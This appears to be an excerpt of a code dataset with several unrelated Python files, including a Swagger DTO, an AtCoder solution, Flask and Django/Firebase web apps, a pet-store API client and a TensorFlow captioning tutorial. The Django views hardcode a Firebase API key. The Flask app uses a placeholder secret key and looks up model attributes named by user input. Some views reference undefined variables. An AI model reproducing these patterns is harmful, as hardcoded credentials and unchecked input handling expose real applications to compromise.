# noqa: E501\n :type: str\n \"\"\"\n\n self._avatar_url = avatar_url\n\n @property\n def email(self):\n \"\"\"Gets the email of this OrgUserDTO. # noqa: E501\n\n\n :return: The email of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._email\n\n @email.setter\n def email(self, email):\n \"\"\"Sets the email of this OrgUserDTO.\n\n\n :param email: The email of this OrgUserDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._email = email\n\n @property\n def last_seen_at(self):\n \"\"\"Gets the last_seen_at of this OrgUserDTO. # noqa: E501\n\n\n :return: The last_seen_at of this OrgUserDTO. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._last_seen_at\n\n @last_seen_at.setter\n def last_seen_at(self, last_seen_at):\n \"\"\"Sets the last_seen_at of this OrgUserDTO.\n\n\n :param last_seen_at: The last_seen_at of this OrgUserDTO. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._last_seen_at = last_seen_at\n\n @property\n def last_seen_at_age(self):\n \"\"\"Gets the last_seen_at_age of this OrgUserDTO. # noqa: E501\n\n\n :return: The last_seen_at_age of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._last_seen_at_age\n\n @last_seen_at_age.setter\n def last_seen_at_age(self, last_seen_at_age):\n \"\"\"Sets the last_seen_at_age of this OrgUserDTO.\n\n\n :param last_seen_at_age: The last_seen_at_age of this OrgUserDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._last_seen_at_age = last_seen_at_age\n\n @property\n def login(self):\n \"\"\"Gets the login of this OrgUserDTO. # noqa: E501\n\n\n :return: The login of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._login\n\n @login.setter\n def login(self, login):\n \"\"\"Sets the login of this OrgUserDTO.\n\n\n :param login: The login of this OrgUserDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._login = login\n\n @property\n def name(self):\n \"\"\"Gets the name of this OrgUserDTO. # noqa: E501\n\n\n :return: The name of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this OrgUserDTO.\n\n\n :param name: The name of this OrgUserDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def org_id(self):\n \"\"\"Gets the org_id of this OrgUserDTO. # noqa: E501\n\n\n :return: The org_id of this OrgUserDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._org_id\n\n @org_id.setter\n def org_id(self, org_id):\n \"\"\"Sets the org_id of this OrgUserDTO.\n\n\n :param org_id: The org_id of this OrgUserDTO. # noqa: E501\n :type: int\n \"\"\"\n\n self._org_id = org_id\n\n @property\n def role(self):\n \"\"\"Gets the role of this OrgUserDTO. # noqa: E501\n\n\n :return: The role of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._role\n\n @role.setter\n def role(self, role):\n \"\"\"Sets the role of this OrgUserDTO.\n\n\n :param role: The role of this OrgUserDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._role = role\n\n @property\n def user_id(self):\n \"\"\"Gets the user_id of this OrgUserDTO. # noqa: E501\n\n\n :return: The user_id of this OrgUserDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._user_id\n\n @user_id.setter\n def user_id(self, user_id):\n \"\"\"Sets the user_id of this OrgUserDTO.\n\n\n :param user_id: The user_id of this OrgUserDTO. 
# noqa: E501\n :type: int\n \"\"\"\n\n self._user_id = user_id\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(OrgUserDTO, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, OrgUserDTO):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, OrgUserDTO):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"midokura/grafana-sync","sub_path":"swagger_client/models/org_user_dto.py","file_name":"org_user_dto.py","file_ext":"py","file_size_in_byte":9410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"9149003015","text":"import heapq\n\nN, M = map(int, input().split())\nAB = [list(map(int, input().split())) for _ in range(M)]\n\nE = [[] for _ in range(N)]\nIn = [0] * N\nfor a, b in AB:\n E[a - 1].append(b - 1)\n In[b - 1] += 1\n\nQue = [i for i, n in enumerate(In) if n == 0]\n\nheapq.heapify(Que)\nans = []\nwhile Que:\n p = heapq.heappop(Que)\n ans.append(p + 1)\n\n for v in E[p]:\n In[v] -= 1\n if In[v] == 0:\n heapq.heappush(Que, v)\n\nif len(ans) == N:\n print(*ans)\nelse:\n print(-1)\n","repo_name":"mikiya1130/AtCoder","sub_path":"field/contests/abc223/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"31313572584","text":"import json\nimport click\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom datetime import timedelta\nfrom flask_migrate import Migrate\n\nfrom forms.auth import UserForm\nfrom libs.helpers import create_database_uri\nfrom model import User\nfrom model.base import db\n\n\napp = Flask(__name__)\napp.secret_key = \"secret key\"\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = create_database_uri()\napp.config[\"SEND_FILE_MAX_AGE_DEFAULT\"] = timedelta(seconds=1)\ndb.init_app(app)\n\n\n@app.cli.command()\ndef initdb():\n db.create_all()\n click.echo(\"Initialized database.\")\n\n\nmigrate = Migrate(app, db)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n form = UserForm(request.form)\n if request.method == \"POST\" and form.validate():\n username = form.username.data\n password = form.password.data\n name = form.name.data\n id_card = form.id_card.data\n email = form.email.data\n phone = form.phone.data\n user = User(username=username, name=name, id_card=id_card, email=email, phone=phone)\n user.set_password(password)\n db.session.add(user)\n db.session.commit()\n return redirect(url_for(\".index\"))\n return render_template(\"index.html\", form=form)\n\n\n@app.route(\"/checkUser\", methods=[\"POST\"])\ndef check_username():\n if request.method == \"POST\":\n data = json.loads(request.get_data().decode('utf-8'))\n print(data.keys())\n print(User.__dict__[list(data.keys())[0]])\n print(data)\n if User.query.filter(User.__dict__[list(data.keys())[0]] == data[list(data.keys())[0]]).first():\n print(1)\n return json.dumps({\"code\": 1})\n print(2)\n return json.dumps({\"code\": 0})\n\n\n","repo_name":"redsnowc/FromValidator","sub_path":"demoAjax/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36824414259","text":"from django.shortcuts import render, redirect\nimport pyrebase\nfrom django.contrib import auth\nfrom django import forms\nfrom django.utils.safestring import mark_safe\nfrom rest_framework.renderers import TemplateHTMLRenderer\nfrom rest_framework.response import Response\nfrom rest_framework.utils import json\n\nfrom.forms import *\nfrom mainapp.models import School, Room, Building, Topic, Course, Program, CourseSchedule\n\n# Create your views here.\nfrom mainapp.forms import StaffForm, StudentForm, ParentForm\nfrom mainapp.serializer import SchoolSerializer\n\nconfig = {\n 'apiKey': \"AIzaSyCrAG2_pI8A00gIAPBniRLqv7Kym2d97f0\",\n 'authDomain': \"fir-project-8cea6.firebaseapp.com\",\n 'databaseURL': \"https://fir-project-8cea6.firebaseio.com\",\n 'projectId': \"fir-project-8cea6\",\n 'storageBucket': \"fir-project-8cea6.appspot.com\",\n 'messagingSenderId': \"609798741798\"\n\n}\n\nfirebase = pyrebase.initialize_app(config)\n\nauthe = firebase.auth()\ndb = firebase.database()\nstorage = firebase.storage()\n# ids = list(db.child('Schools').shallow().get().val())\n# mykeys = list(db.child('Schools').child(ids[1]).get().val().keys())\n# allvalues = db.child('Schools').get().val()\n\n\n\n\nitems=['Schools','Rooms','Buildings','Topics', 'Courses', 'Programs', 'CourseSchedules','Questions']\n\n\ndef sign(request):\n return render(request, \"source/login.html\")\n\n\ndef postsign(request):\n email = request.POST.get(\"email\")\n passw = request.POST.get(\"pass\")\n try:\n user = authe.sign_in_with_email_and_password(email, passw)\n return render(request, \"source/admin.html\",{'items':items})\n except:\n message = \"Invalid Credentials\"\n print(message)\n return render(request, \"source/login.html\", {\"messg\": message})\n\n # print(user['idToken'])\n # session_id = user['idToken']\n # request.session['uid'] = str(session_id)\n\n\ndef allform(request, formtype,id=None):\n class AllForm(MyStyleForm):\n class Meta:\n model = getform(formtype)\n fields = ('__all__')\n # for editing forms\n if id:\n forminstance=db.child(formtype).child(id).get().val()\n form = AllForm(forminstance)\n # for adding new data into forms\n else:\n form=AllForm()\n\n if request.method == 'POST':\n form = AllForm(request.POST)\n # print(request.POST)\n xyz=dict(request.POST)\n print(xyz.keys())\n pqr=xyz['MyUser']\n request.POST._mutable = True\n r=request.POST\n\n\n del r['csrfmiddlewaretoken']\n del r['MyUser']\n\n mno=r\n print(mno)\n data={'user':pqr,'details':mno}\n\n if form.is_valid:\n # schoolid = r['csrfmiddlewaretoken']\n # del r['csrfmiddlewaretoken']\n # me=mark_safe(json.dumps(r))\n db.child(formtype).push(data)\n\n return redirect('/mainapp/home/')\n args = {'form': form, 'items':items}\n\n return render(request, 'allforms.html', args)\n\n\ndef home(request):\n # print(allvalues)\n myvalues=[]\n # print(mykeys)\n # print(allvalues)\n # for i in mykeys:\n # myvalues.append(allvalues[i])\n from django.utils.safestring import mark_safe\n import json\n x=mark_safe(json.dumps(allvalues))\n print(x)\n # print(myvalues)\n # serializer = SchoolSerializer(allvalues)\n # print(serializer)\n # return Response({'serializer': serializer, 'profile': profile})\n # genres = keys['city']\n # print(title)\n # print(genres)\n # for i in ids:\n # for j in keys:\n # bc=db.child('Schools').child(i).get().val()[j]\n # print(bc)\n # print(\"break\")\n testing={'hello':'hy','numb':45}\n\n return render(request, 'home.html',{'x':x,'ids':ids})\n\n\ndef userform(request, formtype):\n if formtype == 
'staff':\n form = StaffForm()\n category = \"Staff\"\n elif formtype == 'student':\n form = StudentForm()\n category = \"Student\"\n elif formtype == 'parent':\n form = ParentForm()\n category = \"Parent\"\n\n if request.method =='POST':\n # print(request.POST)\n request.POST._mutable = True\n r = request.POST\n\n if form.is_valid:\n del r['csrfmiddlewaretoken']\n print(json.dumps(r))\n db.child(\"Users\").child(category).push(r)\n return redirect('abcyutjytg')\n\n args = {'form': form, 'items': items}\n\n return render(request, \"source/form.html\", args)\n\nfrom rest_framework.views import APIView\n\n\nclass ProfileDetail(APIView):\n renderer_classes = [TemplateHTMLRenderer]\n template_name = 'home.html'\n\n def get(self, requests,pk):\n ids = list(db.child('Schools').shallow().get().val())\n mykeys = list(db.child('Schools').child(ids[1]).get().val().keys())\n allvalues = db.child('Schools').child(ids[1]).get().val()\n serializer = SchoolSerializer(allvalues)\n return Response({'serializer': serializer})\n\n #\n # def post(self, request, pk):\n # profile = get_object_or_404(Profile, pk=pk)\n # serializer = ProfileSerializer(profile, data=request.data)\n # if not serializer.is_valid():\n # return Response({'serializer': serializer, 'profile': profile})\n # serializer.save()\n # return redirect('profile-list')\n\ndef test(request):\n allvalues = db.child('Schools').get().val()\n import json\n jsonobj=mark_safe(json.dumps(allvalues))\n return render(request,'test.html',{'jsonobj':jsonobj})\n # # print(allvalues)\n # print(mykeys)\n #\n # print(ids)\n # whole_data=[]\n # single_data=[]\n # for j in range(len(ids)):\n # datas = [ids[j]]\n # for i in range(len(mykeys)):\n # datas.append(db.child('Schools').child(ids[j]).get().val()[mykeys[i]])\n # whole_data.append(datas)\n # # whole_data.append(single_data)\n # print(datas)\n # print(single_data)\n # mykeys.insert(0, \"schoolid\")\n # # print(whole_data)\n # comb_list=zip(mykeys,whole_data)\n # print(comb_list)\n","repo_name":"surazaz/Social_network","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"28505688874","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport csv\nimport networkx as nx\n\n\n# In[2]:\n\n\nwith open('paths_finished.tsv', newline='') as f:\n reader = csv.reader(f)\n pfread = list(reader)\nf.close()\n\npfread=pfread[16:]\n\n\n# In[ ]:\n\n\n\n\n\n# In[3]:\n\n\nwith open('article-ids.csv', newline='') as f:\n reader = csv.reader(f)\n article = list(reader)\nf.close()\n\n\n\n\n# In[4]:\n\n\nwith open('article-categories.csv', newline='') as f:\n reader = csv.reader(f)\n ac = list(reader)\nf.close()\n\n\n# In[5]:\n\n\na_map=dict()\nfor i in article:\n a_map[i[0]]=i[1]\n \n#print(a_map)\n\n\n# In[6]:\n\n\nc_map=dict()\n\nfor i in ac:\n c_map[i[0]]=i[1:]\n\n#print(c_map)\n\n\n# In[7]:\n\n\ndef modify(l):\n if '<' not in l:\n return l\n index=-1\n for i in range(0,len(l)):\n if l[i]=='<':\n index=i\n break\n \n temp1=l[:index-1]\n temp2=l[index+1:]\n l=temp1+temp2\n return modify(l)\n\n\nhp=dict()\nht=dict()\nsp=dict()\nst=dict()\n\nfor n in range(1,147):\n id=str(n)\n id=id.zfill(4)\n id='C'+id\n hp[id]=0\n ht[id]=0\n sp[id]=0\n st[id]=0\n\n\n\n\nfor line in pfread:\n line_arr=line[0].split('\\t')\n s=line_arr[-2]\n #if '<' in s:\n # continue\n \n #s=s.strip()\n #x=s.find('\\t')\n #s=s[:x]\n s_arr=s.split(';')\n #print(s_arr)\n cat_list=list()\n cat_set=set()\n s_arr=modify(s_arr)\n if len(s_arr)<=1:\n continue\n for art in s_arr:\n aid=a_map[art]\n cl=c_map[aid]\n for c in cl:\n cat_list.append(c)\n cat_set.add(c)\n \n for i in cat_list:\n hp[i]=hp[i]+1\n for i in cat_set:\n ht[i]=ht[i]+1\n \n \n#print(len(hp))\n#print(len(ht))\n#print(hp)\n#print(ht)\n\n\n# In[8]:\n\n\nwith open('edges.csv', newline='') as f:\n reader = csv.reader(f)\n edge_list= list(reader)\nf.close()\n\n\n# In[9]:\n\n\ns=set()\nisolated_nodes=set()\nfor i in edge_list:\n for j in i:\n s.add(j)\n\nfor c in range(1,4605):\n id=str(c)\n id=id.zfill(4)\n id='A'+id\n if id not in s:\n isolated_nodes.add(id)\n#print(isolated_nodes)\n\n \n\n\n# In[10]:\n\n\nG = nx.DiGraph()\nG.add_edges_from(edge_list)\n\n\n# In[11]:\n\n\n#p = nx.shortest_path(G, source='A0010', target='A0099')\n#print(p)\n\n\n# In[12]:\n\n\n\n\n\nfor line in pfread:\n line_arr=line[0].split('\\t')\n s=line_arr[-2]\n #if '<' in s:\n # continue\n \n #s=s.strip()\n #x=s.find('\\t')\n #s=s[:x]\n s_arr=s.split(';')\n s_arr=modify(s_arr)\n if len(s_arr)<=1:\n continue\n #print(s_arr)\n cat_list=list()\n cat_set=set()\n sa=list()\n for a in s_arr:\n aid=a_map[a]\n sa.append(aid)\n #print(sa) \n if sa[0] in isolated_nodes:\n continue\n if sa[-1] in isolated_nodes:\n continue\n shortest_path=nx.shortest_path(G, source=sa[0], target=sa[-1])\n \n #print(shortest_path)\n for aid in shortest_path:\n cl=c_map[aid]\n for c in cl:\n cat_list.append(c)\n cat_set.add(c)\n \n for i in cat_list:\n sp[i]=sp[i]+1\n for i in cat_set:\n st[i]=st[i]+1\n \n#print(len(sp))\n#print(len(st))\n#print(sp)\n#print(st)\n \n\n\n# In[13]:\n\n\n\nresult=list()\n\n\nfor k in hp:\n e=[k,ht[k],hp[k],st[k],sp[k]]\n result.append(e)\n \n\n\n# In[14]:\n\n\nfile = open('category-paths.csv', 'w+', newline ='') \nwith file: \n write = csv.writer(file) \n write.writerows(result) \nfile.close()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"debanjanchatterjee/CS685-data-mining","sub_path":"Assignment 2/category-paths-generator.py","file_name":"category-paths-generator.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"11266944930","text":"import requests\nimport json\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\n\nclass PetFriends:\n def __init__(self):\n self.base_url = \"https://petfriends1.herokuapp.com/\"\n\n def get_api_key(self, email, password):\n \"\"\"Метод делает запрос к API сервера и возвращает статус запроса и результат\"\"\"\n headers = {\n 'email': email,\n 'password': password\n }\n res = requests.get(self.base_url+'api/key', headers=headers)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except:\n result = res.text\n return status, result\n\n def get_list_of_pets(self, auth_key, filter):\n \"\"\"Метод делает запрос к API сервера и возвращает статус запроса со списком наденных питомцев\"\"\"\n headers = {'auth_key': auth_key['key']}\n filter = {'filter': filter}\n\n res = requests.get(self.base_url + 'api/pets', headers=headers, params=filter)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except:\n result = res.text\n return status, result\n\n def add_new_pet(self, auth_key, name: str, animal_type: str,\n age: str, pet_photo: str):\n \"\"\"Метод добавляет нового питомца\"\"\"\n data = MultipartEncoder(\n fields={\n 'name': name,\n 'animal_type': animal_type,\n 'age': age,\n 'pet_photo': (pet_photo, open(pet_photo, 'rb'), 'image/jpeg')\n })\n headers = {'auth_key': auth_key['key'], 'Content-Type': data.content_type}\n\n res = requests.post(self.base_url + 'api/pets', headers=headers, data=data)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except:\n result = res.text\n print(result)\n return status, result\n\n def delete_pet(self, auth_key: json, pet_id: str) -> json:\n \"\"\"Метод удаляет питомца\"\"\"\n headers = {'auth_key': auth_key['key']}\n res = requests.delete(self.base_url + 'api/pets/' + pet_id, headers=headers)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except json.decoder.JSONDecodeError:\n result = res.text\n return status, result\n\n def update_pet_info(self, auth_key: json, pet_id: str, name: str,\n animal_type: str, age: int) -> json:\n \"\"\"Метод обновляет данные питомца\"\"\"\n headers = {'auth_key': auth_key['key']}\n data = {\n 'name': name,\n 'age': age,\n 'animal_type': animal_type\n }\n\n res = requests.put(self.base_url + 'api/pets/' + pet_id, headers=headers, data=data)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except json.decoder.JSONDecodeError:\n result = res.text\n return status, result\n\n def post_create_pet_simple(self, auth_key:json, name:str,\n animal_type:str, age:str) -> json:\n \"\"\"Метод добавляет данные о питомце без фото\"\"\"\n heardes = {'auth_key': auth_key['key']}\n data= {'name': name, 'animal_type': animal_type, 'age': age}\n res = requests.post(self.base_url+'api/create_pet_simple', headers= heardes, data= data)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except:\n result = res.text\n return status, result\n\n def post_add_photo_pets(self, auth_key:json,\n pet_id : str, pet_photo:str) -> json:\n \"\"\"Метод добавляет фото питомца\"\"\"\n data = MultipartEncoder(\n fields={\n 'pet_photo': (pet_photo, open(pet_photo, 'rb'), 'image/jpeg')\n })\n heardes = {'auth_key': auth_key['key'],\n 'Content-Type': data.content_type}\n res= requests.post(self.base_url+'api/pets/set_photo/'+pet_id,\n headers=heardes, data=data)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except:\n result = res.text\n return status, 
result","repo_name":"LousySkill/PythonTheme","sub_path":"PetFriendsApiTests/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32271949811","text":"#题目:输入3个数a,b,c,按大小顺序输出。\nn1 = int(input('n1 = :\\n'))\nn2 = int(input('n2 = :\\n'))\nn3 = int(input('n3 = :\\n'))\ndef swap(p1,p2):\n return p2,p1\nif n1 > n2 : \n n1,n2 = swap(n1,n2)\nif n1 > n3 :\n n1,n3 = swap(n1,n3)\nif n2 > n3 : \n n2,n3 = swap(n2,n3)\nprint (n1,n2,n3)","repo_name":"lidongteam/LaserSLAM","sub_path":"新人培训/陈宏干/答案/习题66.py","file_name":"习题66.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"zh","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
+{"seq_id":"9578151677","text":"#Leia um número e escreva se o número é inteiro ou decimal.\n\ndef main():\n \n print('INTEIRO OU DECIMAL?\\n')\n numero = float(input('Número: '))\n result = eh_racional(numero)\n print(f'O número {numero} é {result}')\n\ndef eh_racional(numero):\n \n p_decimal = numero % 1\n if p_decimal == 0:\n return 'inteiro'\n else:\n return 'decimal'\n\nmain()","repo_name":"MicherlaneSilva/ifpi-ads-algoritmos2020","sub_path":"fabio_2/fabio_2_p2/f2_p2_q12.py","file_name":"f2_p2_q12.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"5285815513","text":"# Import TensorFlow and enable eager execution\n# This code requires TensorFlow version >=1.9\nimport pickle\nfrom PIL import Image\nfrom glob import glob\nimport json\nimport time\nimport os\nimport numpy as np\nimport re\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\ntf.enable_eager_execution()\n\n# We'll generate plots of attention in order to see which parts of an image\n# our model focuses on during captioning\n\n# Scikit-learn includes many helpful utilities\n\n\n######################## Download MS-COCO dataset\nannotation_zip = tf.keras.utils.get_file('captions.zip',\n cache_subdir=os.path.abspath('.'),\n origin='http://images.cocodataset.org/annotations/annotations_trainval2014.zip',\n extract=True)\nannotation_file = os.path.dirname(\n annotation_zip)+'/annotations/captions_train2014.json'\n\nname_of_zip = 'train2014.zip'\nif not os.path.exists(os.path.abspath('.') + '/' + name_of_zip):\n image_zip = tf.keras.utils.get_file(name_of_zip,\n cache_subdir=os.path.abspath('.'),\n origin='http://images.cocodataset.org/zips/train2014.zip',\n extract=True)\n PATH = os.path.dirname(image_zip)+'/train2014/'\nelse:\n PATH = os.path.abspath('.')+'/train2014/'\n\n######################## Limit the size of training set for training faster\n# read the json file\nwith open(annotation_file, 'r') as f:\n annotations = json.load(f)\n\n# storing the captions and the image name in vectors\nall_captions = []\nall_img_name_vector = []\n\nfor annot in annotations['annotations']:\n caption = ' ' + annot['caption'] + ' '\n image_id = annot['image_id']\n full_coco_image_path = PATH + 'COCO_train2014_' + '%012d.jpg' % (image_id)\n\n all_img_name_vector.append(full_coco_image_path)\n all_captions.append(caption)\n\n# shuffling the captions and image_names together\n# setting a random state\ntrain_captions, img_name_vector = shuffle(all_captions,\n all_img_name_vector,\n random_state=1)\n\n# selecting the first 30000 captions from the shuffled set\nnum_examples = 500\ntrain_captions = train_captions[:num_examples]\nimg_name_vector = img_name_vector[:num_examples]\n\nprint(len(train_captions), len(all_captions))\n\n######################## Preprocess the images using InceptionV3\ndef load_image(image_path):\n img = tf.read_file(image_path)\n img = tf.image.decode_jpeg(img, channels=3)\n img = tf.image.resize_images(img, (299, 299))\n img = tf.keras.applications.inception_v3.preprocess_input(img)\n return img, image_path\n\n\n######################## Initialize InceptionV3 and load the pretrained Imagenet weights\nimage_model = tf.keras.applications.InceptionV3(include_top=False,\n weights='imagenet')\nnew_input = image_model.input\nhidden_layer = image_model.layers[-1].output\n\nimage_features_extract_model = tf.keras.Model(new_input, hidden_layer)\n\n######################## Caching the features extracted from InceptionV3\n# getting the unique images\nencode_train = sorted(set(img_name_vector))\n\n# feel free to change the batch_size according to your system configuration\nimage_dataset = tf.data.Dataset.from_tensor_slices(\n encode_train).map(load_image).batch(16)\n\nfor img, path in image_dataset:\n batch_features = image_features_extract_model(img)\n batch_features = tf.reshape(batch_features,\n (batch_features.shape[0], -1, batch_features.shape[3]))\n\n for bf, p in zip(batch_features, path):\n path_of_feature = p.numpy().decode(\"utf-8\")\n np.save(path_of_feature, 
bf.numpy())\n\n######################## Preprocess and tokenize the captions\n# This will find the maximum length of any caption in our dataset\n\n\ndef calc_max_length(tensor):\n return max(len(t) for t in tensor)\n\n\n# The steps above is a general process of dealing with text processing\n# choosing the top 5000 words from the vocabulary\ntop_k = 5000\ntokenizer = tf.keras.preprocessing.text.Tokenizer(num_words=top_k,\n oov_token=\"\",\n filters='!\"#$%&()*+.,-/:;=?@[\\]^_`{|}~ ')\ntokenizer.fit_on_texts(train_captions)\ntrain_seqs = tokenizer.texts_to_sequences(train_captions)\ntokenizer.word_index[''] = 0\n\n# creating the tokenized vectors\ntrain_seqs = tokenizer.texts_to_sequences(train_captions)\n\n# padding each vector to the max_length of the captions\n# if the max_length parameter is not provided, pad_sequences calculates that automatically\ncap_vector = tf.keras.preprocessing.sequence.pad_sequences(\n train_seqs, padding='post')\n\n# calculating the max_length\n# used to store the attention weights\nmax_length = calc_max_length(train_seqs)\n\n######################## Split the data into training and testing\n# Create training and validation sets using 80-20 split\nimg_name_train, img_name_val, cap_train, cap_val = train_test_split(img_name_vector,\n cap_vector,\n test_size=0.2,\n random_state=0)\nprint(len(img_name_train), len(cap_train), len(img_name_val), len(cap_val))\n\n######################## Our images and captions are ready! Next, let's create a tf.data dataset to use for training our model.\n# feel free to change these parameters according to your system's configuration\nBATCH_SIZE = 64\nBUFFER_SIZE = 1000\nembedding_dim = 256\nunits = 512\nvocab_size = len(tokenizer.word_index)\n# shape of the vector extracted from InceptionV3 is (64, 2048)\n# these two variables represent that\nfeatures_shape = 2048\nattention_features_shape = 64\n\n# loading the numpy files \n\ndef map_func(img_name, cap):\n img_tensor = np.load(img_name.decode('utf-8')+'.npy')\n return img_tensor, cap\n\ndataset = tf.data.Dataset.from_tensor_slices((img_name_train, cap_train))\n\n# using map to load the numpy files in parallel\n# NOTE: Be sure to set num_parallel_calls to the number of CPU cores you have\n# https://www.tensorflow.org/api_docs/python/tf/py_func\ndataset = dataset.map(lambda item1, item2: tf.py_func(\n map_func, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=8)\n\n# shuffling and batching\ndataset = dataset.shuffle(BUFFER_SIZE)\n# https://www.tensorflow.org/api_docs/python/tf/contrib/data/batch_and_drop_remainder\ndataset = dataset.batch(BATCH_SIZE)\ndataset = dataset.prefetch(1)\n\n##################### Model\n\ndef gru(units):\n # If you have a GPU, we recommend using the CuDNNGRU layer (it provides a\n # significant speedup).\n if tf.test.is_gpu_available():\n return tf.keras.layers.CuDNNGRU(units,\n return_sequences=True,\n return_state=True,\n recurrent_initializer='glorot_uniform')\n else:\n return tf.keras.layers.GRU(units,\n return_sequences=True,\n return_state=True,\n recurrent_activation='sigmoid',\n recurrent_initializer='glorot_uniform')\n\n\nclass BahdanauAttention(tf.keras.Model):\n def __init__(self, units):\n super(BahdanauAttention, self).__init__()\n self.W1 = tf.keras.layers.Dense(units)\n self.W2 = tf.keras.layers.Dense(units)\n self.V = tf.keras.layers.Dense(1)\n\n def call(self, features, hidden):\n # features(CNN_encoder output) shape == (batch_size, 64, embedding_dim)\n\n # hidden shape == (batch_size, hidden_size)\n # hidden_with_time_axis shape 
== (batch_size, 1, hidden_size)\n hidden_with_time_axis = tf.expand_dims(hidden, 1)\n\n # score shape == (batch_size, 64, hidden_size)\n score = tf.nn.tanh(self.W1(features) + self.W2(hidden_with_time_axis))\n\n # attention_weights shape == (batch_size, 64, 1)\n # we get 1 at the last axis because we are applying score to self.V\n attention_weights = tf.nn.softmax(self.V(score), axis=1)\n\n # context_vector shape after sum == (batch_size, hidden_size)\n context_vector = attention_weights * features\n context_vector = tf.reduce_sum(context_vector, axis=1)\n\n return context_vector, attention_weights\n\nclass CNN_Encoder(tf.keras.Model):\n # Since we have already extracted the features and dumped it using pickle\n # This encoder passes those features through a Fully connected layer\n def __init__(self, embedding_dim):\n super(CNN_Encoder, self).__init__()\n # shape after fc == (batch_size, 64, embedding_dim)\n self.fc = tf.keras.layers.Dense(embedding_dim)\n \n def call(self, x):\n x = self.fc(x)\n x = tf.nn.relu(x)\n return x\n\nclass RNN_Decoder(tf.keras.Model):\n def __init__(self, embedding_dim, units, vocab_size):\n super(RNN_Decoder, self).__init__()\n self.units = units\n\n self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)\n self.gru = gru(self.units)\n self.fc1 = tf.keras.layers.Dense(self.units)\n self.fc2 = tf.keras.layers.Dense(vocab_size)\n \n self.attention = BahdanauAttention(self.units)\n \n def call(self, x, features, hidden):\n # defining attention as a separate model\n context_vector, attention_weights = self.attention(features, hidden)\n \n # x shape after passing through embedding == (batch_size, 1, embedding_dim)\n x = self.embedding(x)\n \n # x shape after concatenation == (batch_size, 1, embedding_dim + hidden_size)\n x = tf.concat([tf.expand_dims(context_vector, 1), x], axis=-1)\n \n # passing the concatenated vector to the GRU\n output, state = self.gru(x)\n \n # shape == (batch_size, max_length, hidden_size)\n x = self.fc1(output)\n \n # x shape == (batch_size * max_length, hidden_size)\n x = tf.reshape(x, (-1, x.shape[2]))\n \n # output shape == (batch_size * max_length, vocab)\n x = self.fc2(x)\n\n return x, state, attention_weights\n\n def reset_state(self, batch_size):\n return tf.zeros((batch_size, 